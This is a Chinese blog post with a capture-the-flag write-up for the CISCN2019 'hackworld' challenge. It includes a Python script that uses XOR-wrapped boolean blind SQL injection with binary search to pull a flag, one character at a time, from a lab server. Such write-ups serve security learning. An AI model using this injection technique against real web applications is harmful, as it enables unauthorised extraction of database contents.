bucketful [CISCN2019] hackworld wp

bucketful [CISCN2019] hackworld

因为这题限制了数字型注入，而且限制了回显的信息，回显的信息就只有当你输入数字为1，0的时候才显示“女朋友”，而异或得出得结果刚好符合这题的输入。

import requests
import time

url = "http://a3651aca-3614-47fc-b5e3-2e16cea38594.node4.buuoj.cn:81/index.php"
temp = {"id" : ""}
flag = ""
for i in range(1,1000):
    time.sleep(0.06)
    low = 32
    high =128
    mid = (low+high)//2
    while(low<high):
        temp["id"] = "1^" + "(ascii(substr((select(flag)from(flag)),%d,1))>%d)^1" %(i,mid)
        r = requests.post(url,data=temp)
        print(low,high,mid,":")
        if "Hello" in r.text:
            low = mid+1
        else:
            high = mid
        mid =(low+high)//2
    if(mid ==32 or mid ==127):
        break
    flag +=chr(mid)
    print(flag)


print("flag=" ,flag)

这段代码来自别人的wp，使用的二分查找法来加快速度，题目提示答案的表和列名，然后如果能搞到的话，那么会回显hello，这样就可以判断是否猜到了。

posted @ 2021-09-29 23:55 Hanky_D 阅读(57) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

Hanky_D

bucketful [CISCN2019] hackworld wp

bucketful [CISCN2019] hackworld

公告